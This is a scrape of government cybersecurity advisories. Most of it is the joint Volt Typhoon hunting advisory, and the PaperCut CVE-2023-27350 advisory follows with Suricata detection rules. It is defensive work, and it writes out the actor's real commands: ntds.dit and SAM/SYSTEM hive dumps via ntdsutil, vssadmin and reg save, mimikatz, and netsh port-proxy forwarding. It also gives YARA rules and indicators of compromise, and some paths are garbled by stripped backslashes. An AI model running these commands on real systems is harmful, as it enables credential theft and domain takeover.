RSS Bulletins from National Cyber Awareness System
The United States and international cybersecurity authorities are issuing this joint Cybersecurity Advisory (CSA) to highlight a recently discovered cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.
This advisory from the United States National Security Agency (NSA), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Federal Bureau of Investigation (FBI), the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), the Communications Security Establishment’s Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), and the United Kingdom National Cyber Security Centre (NCSC-UK) (hereafter referred to as the “authoring agencies”) provides an overview of hunting guidance and associated best practices to detect this activity.
One of the actor’s primary tactics, techniques, and procedures (TTPs) is living off the land, which uses built-in network administration tools to perform their objectives. This TTP allows the actor to evade detection by blending in with normal Windows system and network activities, avoid endpoint detection and response (EDR) products that would alert on the introduction of third-party applications to the host, and limit the amount of activity that is captured in default logging configurations. Some of the built-in tools this actor uses are: wmic, ntdsutil, netsh, and PowerShell. The advisory provides examples of the actor’s commands along with detection signatures to aid network defenders in hunting for this activity. Many of the behavioral indicators included can also be legitimate system administration commands that appear in benign activity. Care should be taken not to assume that findings are malicious without further investigation or other indications of compromise.
Download the PDF version of this report (723 KB)
This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.
The authoring agencies are aware of recent People’s Republic of China (PRC) state-sponsored cyber activity and have identified potential indicators associated with these techniques. This advisory will help net defenders hunt for this activity on their systems. It provides many network and host artifacts associated with the activity occurring after the network has been initially compromised, with a focus on command lines used by the cyber actor. An Indicators of compromise (IOCs) summary is included at the end of this advisory.
Especially for living off the land techniques, it is possible that some command lines might appear on a system as the result of benign activity and would be false positive indicators of malicious activity. Defenders must evaluate matches to determine their significance, applying their knowledge of the system and baseline behavior. Additionally, if creating detection logic based on these commands, network defenders should account for variability in command string arguments, as items such as ports used may be different across environments.
The actor has leveraged compromised small office/home office (SOHO) network devices as intermediate infrastructure to obscure their activity by having much of the command and control (C2) traffic emanate from local ISPs in the geographic area of the victim. Owners of SOHO devices should ensure that network management interfaces are not exposed to the Internet to avoid them being re-purposed as redirectors by malicious actors. If they must be exposed to the Internet, device owners and operators should ensure they follow zero trust principles and maintain the highest level of authentication and access controls possible.
The actor has used Earthworm and a custom Fast Reverse Proxy (FRP) client with hardcoded C2 callbacks [T1090] to ports 8080, 8443, 8043, 8000, and 10443 with various filenames including, but not limited to:
cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe.
The actor has executed the following command to gather information about local drives [T1082]:
cmd.exe /C "wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename"
This command does not require administrative credentials to return results. The command uses a command prompt [T1059.003] to execute a Windows Management Instrumentation Command Line (WMIC) query, collecting information about the storage devices on the local host, including drive letter, file system (e.g., new technology file system [NTFS]), free space and drive size in bytes, and an optional volume name. Windows Management Instrumentation (WMI) is a built-in Windows tool that allows a user to access management information from hosts in an enterprise environment. The command line version of WMI is called WMIC.
By default, WMI Tracing is not enabled, so the WMI commands being executed and the associated user might not be available. Additional information on WMI events and tracing can be found in the References section of the advisory.
The actor may try to exfiltrate the ntds.dit file and the SYSTEM registry hive from Windows domain controllers (DCs) out of the network to perform password cracking [T1003.003]. (The ntds.dit file is the main Active Directory (AD) database file and, by default, is stored at %SystemRoot%NTDSntds.dit. This file contains information about users, groups, group memberships, and password hashes for all users in the domain; the SYSTEM registry hive contains the boot key that is used to encrypt information in the ntds.dit file.) Although the ntds.dit file is locked while in use by AD, a copy can be made by creating a Volume Shadow Copy and extracting the ntds.dit file from the Shadow Copy. The SYSTEM registry hive may also be obtained from the Shadow Copy. The following example commands show the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.
cmd /c vssadmin create shadow /for=C: > C:WindowsTemp.tmp cmd /c copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit C:WindowsTemp > C:WindowsTemp .tmp
The built-in Ntdsutil.exe tool performs all these actions using a single command. There are several ways to execute Ntdsutil.exe, including running from an elevated command prompt (cmd.exe), using WMI/WMIC, or PowerShell. Defenders should look for the execution of Ntdsutil.exe commands using long, short, or a combination of the notations. For example, the long notation command activate instance ntds ifm can also be executed using the short notation ac i ntds i. Table 1 provides the long and short forms of the arguments used in the sample Ntdsutil.exe command, along with a brief description of the arguments.
Long form |
Short form |
Description |
---|---|---|
activate instance % |
ac i % |
Sets variable % as the active instance for ntdsutil to use |
ifm |
i |
Install from media (ifm). Creates installation media to be used with DCPromo so the server will not need to copy data from another Domain Controller on the network |
The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe. Each of the following actor commands is a standalone example; multiple examples are provided to show how syntax and file paths may differ per environment.
wmic process call create "ntdsutil "ac i ntds" ifm "create full C:WindowsTemppro wmic process call create "cmd.exe /c ntdsutil "ac i ntds" ifm "create full C:WindowsTempPro" wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp" "cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:windowsTempMcAfee_Logs & ntdsutil "ac i ntds" ifm "create full C:WindowsTempMcAfee_Logs" cmd.exe /Q /c wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp" 1> \127.0.0.1ADMIN$2>&1
Note: The
Each actor command above creates a copy of the ntds.dit database and the SYSTEM and SECURITY registry hives in the C:WindowsTemp
The actor has also saved the files directly to the C:WindowsTemp and C:UsersPublic directories, so the entirety of those directory structures should be analyzed. Ntdsutil.exe creates two subfolders in the directory specified in the command: an Active Directory folder that contains the ntds.dit and ntds.jfm files, and a registry folder that contains the SYSTEM and SECURITY hives. Defenders should look for this folder structure across their network:
Active Directoryntds.dit Active Directoryntds.jfm registrySECURITY registrySYSTEM
When one of the example commands is executed, several successive log entries are created in the Application log, under the ESENT Source. Associated events can be viewed in Windows Event Viewer by navigating to: Windows Logs | Application. To narrow results to relevant events, select Filter Current Log from the Actions menu on the right side of the screen. In the Event sources dropdown, check the box next to ESENT, then limit the logs to ID numbers 216, 325, 326, and 327. Clicking the OK box will apply the filters to the results.
Since ESENT logging is used extensively throughout Windows, defenders should focus on events that reference ntds.dit. If such events are present, the events’ details should contain the file path where the file copies were created. Since these files can be deleted, or enhanced logging may not be configured on hosts, the file path can greatly aid in a hunt operation. Identifying the user associated with this activity is also a critical step in a hunt operation as other actions by the compromised—or actor-created—user account can be helpful to understand additional actor TTPs, as well as the breadth of the actor's actions.
Note: If an actor can exfiltrate the ntds.dit and SYSTEM registry hive, the entire domain should be considered compromised, as the actor will generally be able to crack the password hashes for domain user accounts, create their own accounts, and/or join unauthorized systems to the domain. If this occurs, defenders should follow guidance for removing malicious actors from victim networks, such as CISA's Eviction Guidance for Network Affected by the SolarWinds and Active Directory/M365 Compromise.
In addition to the above TTPs used by the actor to copy the ntds.dit file, the following tools could be used by an actor to obtain the same information:
Best practices for securing ntds.dit include hardening Domain Controllers and monitoring event logs for ntdsutil.exe and similar process creations. Additionally, any use of administrator privileges should be audited and validated to confirm the legitimacy of executed commands.
The actor has used the following commands to enable port forwarding [T1090] on the host:
"cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=connectport=8443 protocol=tcp"" "cmd.exe /c netsh interface portproxy add v4tov4 listenport=50100 listenaddress=0.0.0.0 connectport=1433 connectaddress= "
where
Netsh is a built-in Windows command line scripting utility that can display or modify the network settings of a host, including the Windows Firewall. The portproxy add command is used to create a host:port proxy that will forward incoming connections on the provided listenaddress and listenport to the connectaddress and connectport. Administrative privileges are required to execute the portproxy command. Each portproxy command above will create a registry key in the HKLMSYSTEMCurrentControlSetServicesPortProxyv4tov4tcp path. Defenders should look for the presences of keys in this path and investigate any anomalous entries.
Note: Using port proxies is not common for legitimate system administration since they can constitute a backdoor into the network that bypasses firewall policies. Administrators should limit port proxy usage within environments and only enable them for the period of time in which they are required.
Defenders should also use unusual IP addresses and ports in the command lines or registry entries to identify other hosts that are potentially included in actor actions. All hosts on the network should be examined for new and unusual firewall and port forwarding rules, as well as IP addresses and ports specified by the actor. If network traffic or logging is available, defenders should attempt to identify what traffic was forwarded though the port proxies to aid in the hunt operation. As previously mentioned, identifying the associated user account that made the networking changes can also aid in the hunt operation.
Firewall rule additions and changes can be viewed in Windows Event Viewer by navigating to:
Applications and Service Logs | Microsoft | Windows | Windows Firewall With Advanced Security | Firewall.
In addition to host-level changes, defenders should review perimeter firewall configurations for unauthorized changes and/or entries that may permit external connections to internal hosts. The actor is known to target perimeter devices in their operations. Firewall logs should be reviewed for any connections to systems on the ports listed in any portproxy commands discovered.
The actor has used the following PowerShell [T1059.001] command to identify successful logons to the host [T1033]:
Get-EventLog security -instanceid 4624
Note: Event ID 4624 is logged when a user successfully logs on to a host and contains useful information such as the logon type (e.g., interactive or networking), associated user and computer account names, and the logon time. Event ID 4624 entries can be viewed in Windows Event Viewer by navigating to:
Windows Logs | Security. PowerShell logs can be viewed in Event Viewer: Applications and Service Logs | Windows PowerShell.
This command identifies what user account they are currently leveraging to access the network, identify other users logged on to the host, or identify how their actions are being logged. If the actor is using a password spray technique [T1110.003], there may be several failed logon (Event ID 4625) events for several different user accounts, followed by one or more successful logons (Event ID 4624) within a short period of time. This period may vary by actor but can range from a few seconds to a few minutes.
If the actor is using brute force password attempts [T1110] against a single user account, there may be several Event ID 4625 entries for that account, followed by a successful logon Event ID 4624. Defenders should also look for abnormal account activity, such as logons outside of normal working hours and impossible time-and-distance logons (e.g., a user logging on from two geographically separated locations at the same time).
The actor regularly employs the use of Impacket’s wmiexec, which redirects output to a file within the victim host's ADMIN$ share (C:Windows) containing an epoch timestamp in its name. The following is an example of the "dir" command being executed by wmiexec.py:
cmd.exe /Q /c *dir 1> \127.0.0.1ADMIN$__1684956600.123456 2>&1
Note: Discovery of an entry similar to the example above in the Windows Event Log and/or a file with a name in a similar format may be evidence of malicious activity and should be investigated further. In the event that only a filename is discovered, the epoch timestamp within the filename reflects the time of execution by default and can be used to help scope threat hunting activities.
The following commands were used by the actor to enumerate the network topology [T1016], the active directory structure [T1069.002], and other information about the target environment [T1069.001], [T1082]:
arp -a curl www.ip-api.com dnscmd . /enumrecords /zone {REDACTED} dnscmd . /enumzones dnscmd /enumrecords {REDACTED} . /additional ipconfig /all ldifde.exe -f c:windowstemp.txt -p subtree net localgroup administrators net group /dom net group "Domain Admins" /dom netsh interface firewall show all netsh interface portproxy show all netsh interface portproxy show v4tov4 netsh firewall show all netsh portproxy show v4tov4 netstat -ano reg query hklmsoftware systeminfo tasklist /v whoami wmic volume list brief wmic service brief wmic product list brief wmic baseboard list full wevtutil qe security /rd:true /f:text /q:*[System[(EventID=4624) and TimeCreated[@SystemTime>='{REDACTED}']] and EventData[Data='{REDACTED}']]
The actor also used the following commands to identify additional opportunities for obtaining credentials in the environment [T1555], [T1003]:
dir C:Users{REDACTED}.sshknown_hosts dir C:users{REDACTED}appdataroamingMozillafirefoxprofiles mimikatz.exe reg query hklmsoftwareOpenSSH reg query hklmsoftwareOpenSSHAgent reg query hklmsoftwarerealvnc reg query hklmsoftwarerealvncvncserver reg query hklmsoftwarerealvncAllusers reg query hklmsoftwarerealvncAllusersvncserver reg query hkcusoftware{REDACTED}puttysession reg save hklmsam ss.dat reg save hklmsystem sy.dat
The actor executed the following additional commands:
7z.exe a -p {REDACTED} c:windowstemp{REDACTED}.7z C:Windowssystem32pcwrun.exe C:UsersAdministratorDesktopWin.exe C:WindowsSystem32cmdbak.exe /c ping -n 1 127.0.0.1 > C:Windowstempputty.log C:WindowsTemptmp.log "cmd.exe" /c dir \127.0.0.1C$ /od "cmd.exe" /c ping –a –n 1"cmd.exe" /c wmic /user: /password: process call create "net stop " " > C:WindowsTemptmp.log" cmd.exe /Q /c cd 1> \127.0.0.1ADMIN$__ 2 2>&1 net use \127.0.0.1IPC$ /y /d powershell start-process -filepath c:windowstemp .bat -windowstyle Hidden rar.exe a –{REDACTED} c:Windowstemp{REDACTED} D:{REDACTED} wmic /node:{REDACTED} /user:{REDACTED} /password:{REDACTED} cmd /c whoami xcopy C:windowstemphp d:{REDACTED}
The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity Frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
To be able to detect the activity described in this CSA, defenders should set the audit policy for Windows security logs to include “audit process creation” and “include command line in process creation events” in addition to accessing the logs. Otherwise, the default logging configurations may not contain the necessary information.
Enabling these options will create Event ID 4688 entries in the Windows Security log to view command line processes. Given the cost and difficulty of logging and analyzing this kind of activity, if an organization must limit the requirements, they should focus on enabling this kind of logging on systems that are externally facing or perform authentication or authorization, especially including domain controllers.
To hunt for the malicious WMI and PowerShell activity, defenders should also log WMI and PowerShell events. By default, WMI Tracing and deep PowerShell logging are not enabled, but they can be enabled by following the configuration instructions linked in the References section.
The actor takes measures to hide their tracks, such as clearing logs [T1070.001]. To ensure log integrity and availability, defenders should forward log files to a hardened centralized logging server, preferably on a segmented network. Such an architecture makes it harder for an actor to cover their tracks as evidence of their actions will be captured in multiple locations.
Defenders should also monitor logs for Event ID 1102, which is generated when the audit log is cleared. All Event ID 1102 entries should be investigated as logs are generally not cleared and this is a known actor tactic to cover their tracks. Even if an event log is cleared on a host, if the logs are also stored on a logging server, the copy of the log will be preserved.
This activity is often linked to malicious exploitation of edge devices and network management devices. Defenders should enable logging on their edge devices, to include system logs, to be able to identify potential exploitation and lateral movement. They should also enable network-level logging, such as sysmon, webserver, middleware, and network device logs.
File names and directory paths used in these commands are only meant to serve as examples. Actual names and paths may differ depending on environment and activity, so defenders should account for variants when performing queries.
Note: Many of the commands are derivatives of common system administration commands that could generate false positives when used alone without additional indicators.
7z.exe a -p {REDACTED} c:windowstemp{REDACTED}.7z c:windowstemp* "C:pstoolspsexec.exe" \{REDACTED} -s cmd /c "cmd.exe /c "netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999"" C:Windowssystem32pcwrun.exe C:UsersAdministratorDesktopWin.exe cmd.exe /C dir /S \{REDACTED}c$Users{REDACTED} >> c:windowstemp{REDACTED}.tmp "cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:windowsTempMcAfee_Logs & ntdsutil "ac i ntds" ifm "create full C:WindowsTempMcAfee_Logs" cmd.exe /Q /c *cd 1> \127.0.0.1ADMIN$__2>&1 cmd.exe /Q /c cd 1> \127.0.0.1ADMIN$__1652470932.9400265 2>&1 cmd.exe /Q /c net group "domain admins" /dom 1>\127.0.0.1ADMIN$__ 2>&1 cmd.exe /Q /c wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp" 1> \127.0.0.1ADMIN$ 2>&1 D:{REDACTED}xcopy C:windowstemphp d:{REDACTED} Get-EventLog security -instanceid 4624 ldifde.exe -f c:windowstempcisco_up.txt -p subtree makecab ..backup210829-020000.zip ..webappsadssphtmlLock.lic move "\ c$userspublicAppfileregistrySYSTEM" ..backup210829-020000.zip netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress={REDACTED} connectport=8443 protocol=tcp netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999 Rar.exe a –{REDACTED} c:WindowstempDMBC2C61.tmp start-process -filepath c:windowstemp .bat -windowstyle hidden 1
Note: The batch file in question (
wmic process call create "cmd.exe /c mkdir C:userspublicAppfile & ntdsutil "ac i ntds" ifm "create full C:userspublicAppfile" q q wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp" wmic process call create "cmd.exe /c ntdsutil "ac i ntds" ifm "create full C:WindowsTempPro" wmic process call create "ntdsutil "ac i ntds" ifm "create full C:WindowsTemp"
Certain patterns in commands (with asterisks for wildcards) can be used to identify potentially malicious commands:
The most common paths where files and executables used by the actor have been found include:
The file names the actor has previously used for such things as malware, scripts, and tools include:
backup.bat |
cl64.exe |
update.bat |
Win.exe |
billagent.exe |
nc.exe |
update.exe |
WmiPrvSE.exe |
billaudit.exe |
rar.exe |
vm3dservice.exe |
WmiPreSV.exe |
cisco_up.exe |
SMSvcService.exe |
watchdogd.exe |
|
In addition to the file names and paths above, malicious files names, believed to be randomly created, in the following format have also been discovered:
C:Windows[a-zA-Z]{8}.exe
f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
ef09b8ff86c276e9b475a6ae6b54f08ed77e09e169f7fc0872eb1d427ee27d31
d6ebde42457fe4b2a927ce53fc36f465f0000da931cfab9b79a36083e914ceca
472ccfb865c81704562ea95870f60c08ef00bcd2ca1d7f09352398c05be5d05d
66a19f7d2547a8a85cee7a62d0b6114fd31afdee090bd43f36b89470238393d7
3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71
41e5181b9553bbe33d91ee204fe1d2ca321ac123f9147bb475c0ed32f9488597
c7fee7a3ffaf0732f42d89c4399cbff219459ae04a81fc6eff7050d53bd69b99
3a9d8bb85fbcfe92bae79d5ab18e4bca9eaf36cea70086e8d1ab85336c83945f
fe95a382b4f879830e2666473d662a24b34fccf34b6b3505ee1b62b32adafa15
ee8df354503a56c62719656fae71b3502acf9f87951c55ffd955feec90a11484
In some cases, the following user-agent string (including the extra spacing) was identified performing reconnaissance activities by this actor:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
rule ShellJSP { strings: $s1 = "decrypt(fpath)" $s2 = "decrypt(fcontext)" $s3 = "decrypt(commandEnc)" $s4 = "upload failed!" $s5 = "aes.encrypt(allStr)" $s6 = "newid" condition: filesize } |
rule EncryptJSP { strings: $s1 = "AEScrypt" $s2 = "AES/CBC/PKCS5Padding" $s3 = "SecretKeySpec" $s4 = "FileOutputStream" $s5 = "getParameter" $s6 = "new ProcessBuilder" $s7 = "new BufferedReader" $s8 = "readLine()" condition: filesize |
rule CustomFRPClient { meta: description=”Identify instances of the actor's custom FRP tool based on unique strings chosen by the actor and included in the tool” strings: $s1 = "%!PS-Adobe-" nocase ascii wide $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide $s4 = "MAGA2024!!!" nocase ascii wide $s5 = "HTTP_PROXYHost: %s" nocase ascii wide condition: all of them } |
rule HACKTOOL_FRPClient { meta: description=”Identify instances of FRP tool (Note: This tool is known to be used by multiple actors, so hits would not necessarily imply activity by the specific actor described in this report)” strings: $s1 = "%!PS-Adobe-" nocase ascii wide $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide $s4 = "HTTP_PROXYHost: %s" nocase ascii wide condition: 3 of them } |
Active Directory and domain controller hardening:
CISA regional cyber threats:
Microsoft Threat Intelligence blog:
Ntdsutil.exe:
PowerShell:
Windows command line process auditing:
Windows Defender Firewall:
Windows management instrumentation:
Windows password spraying:
The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Broadcom, Cisco Talos, Google's Threat Analysis Group, Lumen Technologies, Mandiant, Microsoft Threat Intelligence (MSTI), Palo Alto Networks, SecureWorks, SentinelOne, Trellix, and additional industry partners for their collaboration on this advisory.
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies' governments, and this guidance shall not be used for advertising or product endorsement purposes.
Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation.
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/field-offices.
NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov
NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov
Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and to access alerts and advisories.
Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca.
New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.
United Kingdom organizations: Report a significant cyber security incident at ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.
Table 2 captures all referenced threat actor tactics and techniques in this advisory.
Initial Access |
||
---|---|---|
Technique Title |
ID |
Use |
Exploit Public-facing Application |
Actor used public-facing applications to gain initial access to systems; in this case, Earthworm and PortProxy. |
|
Execution |
||
Windows Management Instrumentation |
The actor executed WMIC commands to create a copy of the SYSTEM registry. |
|
Command and Scripting Interpreter: PowerShell |
The actor used a PowerShell command to identify successful logons to the host. |
|
Command and Scripting Interpreter: Windows Command Shell |
The actor used this primary command prompt to execute a query that collected information about the storage devices on the local host. |
|
Persistence |
||
Server Software Component: Web Shell |
The actor used backdoor web servers with web shells to establish persistence to systems, including some of the webshells being derived from Awen webshell. |
|
Defense Evasion |
||
Hide Artifacts |
The actor selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity. |
|
Indicator Removal: Clear Windows Event Logs |
The actor cleared system event logs to hide activity of an intrusion. |
|
Credential Access |
||
OS Credential Dumping: NTDS |
The actor may try to exfiltrate the ntds.dit file and the SYSTEM registry hive out of the network to perform password cracking. |
|
Brute Force |
The actor attempted to gain access to accounts with multiple password attempts. |
|
Brute Force: Password Spraying |
|
The actor used commonly used passwords against accounts to attempt to acquire valid credentials. |
OS Credential Dumping |
The actor used additional commands to obtain credentials in the environment. |
|
Credentials from Password Stores |
The actors searched for common password storage locations. |
|
Discovery |
||
System Information Discovery |
The actors executed commands to gather information about local drives. |
|
System Owner/User Discovery |
The actors gathered information about successful logons to the host using a PowerShell command. |
|
Permission Groups Discovery: Local Groups |
The actors attempt to find local system groups and permission settings. |
|
Permission Groups Discovery: Doman Groups |
The actors used commands to enumerate the active directory structure. |
|
System Network Configuration Discovery |
The actors used commands to enumerate the network topology. |
|
Command and Control |
||
Proxy |
The actors used commands to enable port forwarding on the host. |
|
Proxy: External Proxy |
The actors used compromised SOHO devices (e.g. routers) to obfuscate the source of their activity. |
The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials. PaperCut released a patch in March 2023.
According to FBI observed information, malicious actors exploited CVE-2023-27350 beginning in mid-April 2023 and continuing through the present. In early May 2023, also according to FBI information, a group self-identifying as the Bl00dy Ransomware Gang attempted to exploit vulnerable PaperCut servers against the Education Facilities Subsector.
This joint advisory provides detection methods for exploitation of CVE-2023-27350 as well and indicators of compromise (IOCs) associated with Bl00dy Ransomware Gang activity. FBI and CISA strongly encourage users and administrators to immediately apply patches, and workarounds if unable to patch. FBI and CISA especially encourage organizations who did not patch immediately to assume compromise and hunt for malicious activity using the detection signatures in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA.
Download the PDF version of this report:
CVE-2023-27350 allows a remote actor to bypass authentication and conduct remote code execution on the following affected installations of PaperCut:[1]
PaperCut servers vulnerable to CVE-2023-27350 implement improper access controls in the SetupCompleted Java class, allowing malicious actors to bypass user authentication and access the server as an administrator. After accessing the server, actors can leverage existing PaperCut software features for remote code execution (RCE). There are currently two publicly known proofs of concept for achieving RCE in vulnerable PaperCut software:
FBI and CISA note that actors may develop other methods for RCE.
The PaperCut server process pc-app.exe
runs with SYSTEM- or root-level privileges. When the software is exploited to execute other processes such as cmd.exe
or powershell.exe
, these child processes are created with the same privileges. Commands supplied with the execution of these processes will also run with the same privileges. As a result, a wide range of post-exploitation activity is possible following initial access and compromise.
This CVE was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog on April 21, 2023.
Education Facilities Subsector entities maintained approximately 68% of exposed, but not necessarily vulnerable, U.S.-based PaperCut servers. In early May 2023, according to FBI information, the Bl00dy Ransomware Gang gained access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed to the internet. Ultimately, some of these operations led to data exfiltration and encryption of victim systems. The Bl00dy Ransomware Gang left ransom notes on victim systems demanding payment in exchange for decryption of encrypted files (see Figure 1).
According to FBI information, legitimate remote management and maintenance (RMM) software was downloaded and executed on victim systems via commands issued through PaperCut’s print scripting interface. External network communications through Tor and/or other proxies from inside victim networks helped Bl00dy Gang ransomware actors mask their malicious network traffic. The FBI also identified information relating to the download and execution of command and control (C2) malware such as DiceLoader, TrueBot, and Cobalt Strike Beacons, although it is unclear at which stage in the attack these tools were executed.
Network defenders should focus detection efforts on three key areas:
SetupCompleted
page of an exposed and vulnerable PaperCut server.pc-app.exe
process.To exploit CVE-2023-27350, a malicious actor must first visit the SetupCompleted
page of the intended target, which will provide the adversary with authentication to the targeted PaperCut server. Deploy the following Emerging Threat Suricata signatures to detect when GET
requests are sent to the SetupCompleted
page. (Be careful of improperly formatted double-quotation marks if copying and pasting signatures from this advisory.)
Note that some of the techniques identified in this section can affect the availability or stability of a system. Defenders should follow organizational policies and incident response best practices to minimize the risk to operations while threat hunting.
alert http any any -> $HOME_NET any (
msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)";
flow:established,to_server;
http.method; content:"GET";
http.uri; content:"/app?service=page/SetupCompleted"; bsize:32; fast_pattern;
reference:cve,2023-27350;
classtype:attempted-admin;
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"page/SetupCompleted"; fast_pattern; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; reference:cve,2023-27350; classtype:attempted-admin; metadata:attack_target Server, cve CVE_2023_27350, deployment Perimeter, deployment Internal, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, confidence High, signature_severity Major, updated_at 2023_05_05;)
Note that these signatures and other rule-based detections, including YARA rules, may fail to detect more advanced iterations of CVE-2023-27350 exploits. Actors are known to adapt exploits to circumvent rule-based detections formulated for the original iterations of exploits observed in the wild. For example, the first rule above detected some of the first known exploits of CVE-2023-27350, but a slight modification of the exploit’s GET request can evade that rule. The second rule was designed to detect a broader range of activity than the first rule.
The following additional Emerging Threat Suricata signatures are designed to detect Domain Name System (DNS) lookups of known malicious domains associated with recent PaperCut exploitation:
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowcsupdates .com)"; dns_query; content:"windowcsupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowcsupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdate .com)"; dns_query; content:"anydeskupdate.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)anydeskupdate.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdates .com)"; dns_query; content:"anydeskupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)anydeskupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
